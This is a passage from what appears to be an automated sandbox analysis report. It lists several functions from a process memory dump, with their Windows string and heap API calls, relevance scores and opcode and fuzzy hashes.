                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BB5D6E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3767559652-0
                                                            • Opcode ID: 09e8ba317c4f19dd4dccb50c92c69dc11123a9e2ad0da4212dea3f1e18b2290e
                                                            • Instruction ID: f1b75800afb7c760023e4ddafc3d5a51afdeec0f71cecf7e9b33729c0b2f6577
                                                            • Opcode Fuzzy Hash: 09e8ba317c4f19dd4dccb50c92c69dc11123a9e2ad0da4212dea3f1e18b2290e
                                                            • Instruction Fuzzy Hash: 0621D272504259BFDB229F78C888EFE7FF8EF09258F448195F8459B200D674EA00A7E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA9FAF, Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: 8de7f7e231b166f2716af6db8127298234bc8a7c57dad98130b045f549be7daa
                                                            • Instruction ID: b4a67ba7eb7152411e34987f2650a2b1c828e58a99b8ad49f7e9940a6b755f84
                                                            • Opcode Fuzzy Hash: 8de7f7e231b166f2716af6db8127298234bc8a7c57dad98130b045f549be7daa
                                                            • Instruction Fuzzy Hash: 4F11A0B2500909BFDB309FA0EC80AAAB73DFF0D318B040198FA8495811D772B5B1DBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA88D8, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(69B25F44,00000000,?,00000000,04BB1E61,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 04BA88E9
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,04BB38EE), ref: 04BA88EE
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • memcpy.NTDLL(00000000,?,00000000,?,?,?,?,?,?,?,04BB38EE), ref: 04BA890A
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BA8928
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                                            • String ID:
                                                            • API String ID: 1697500751-0
                                                            • Opcode ID: f2509027ee0d7c4cfbf3752166080345baec805a76584cbe7af98a15dfbdc43b
                                                            • Instruction ID: bf051bea654861d7480362945777dc8554f0dfe73f413024d456331efdcf3f28
                                                            • Opcode Fuzzy Hash: f2509027ee0d7c4cfbf3752166080345baec805a76584cbe7af98a15dfbdc43b
                                                            • Instruction Fuzzy Hash: 5AF0F67B408741ABD321AA69DC88E5BBB9CEFD8311F440096E94487210E735E824CBB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA95DD, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(05C89986,00000000,73BB81D0,00000000,04BB63E9,00000000), ref: 04BA95ED
                                                            • lstrlen.KERNEL32(?), ref: 04BA95F5
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • lstrcpy.KERNEL32(00000000,05C89986), ref: 04BA9609
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BA9614
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                            • String ID:
                                                            • API String ID: 74227042-0
                                                            • Opcode ID: 339ee815958c8b49b5cd77ef005dc0efc51f67b7ffa7be25d726652507295bcc
                                                            • Instruction ID: 39672f7b5b02f77db4dcf307a68be0b2f87e6c16754c13338c4480ae7a38b241
                                                            • Opcode Fuzzy Hash: 339ee815958c8b49b5cd77ef005dc0efc51f67b7ffa7be25d726652507295bcc
                                                            • Instruction Fuzzy Hash: DCE01273505225A787119FE8DCC8CAFBBACEF9D651704445BFA01E3101C7299C159BB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%